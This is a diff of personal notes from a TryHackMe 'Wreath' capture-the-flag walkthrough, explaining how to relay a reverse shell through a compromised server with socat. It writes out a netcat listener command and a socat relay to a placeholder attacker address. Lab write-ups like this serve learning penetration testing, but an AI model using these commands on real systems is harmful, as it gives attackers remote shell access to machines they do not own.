Platorian/cisco/obsidian/CTF/TryHackMe/Walkthrough/Wreath/Notes.md

 **SOCAT Reverse Shell Relay**

-In this scenario we are using **socat** to create a relay for us to send a reverse shell back to our own attacking machine (as in the diagram above).
+In this scenario we are using **socat** to create a relay for us to send a reverse shell back to our own attacking machine.
 1. First let's start a standard netcat listener on our attacking box (`sudo nc -lvnp 443`).
 2. Next, on the compromised server, use the following command to start the relay:
 `./socat tcp-l:8000 tcp:ATTACKING_IP:443 &`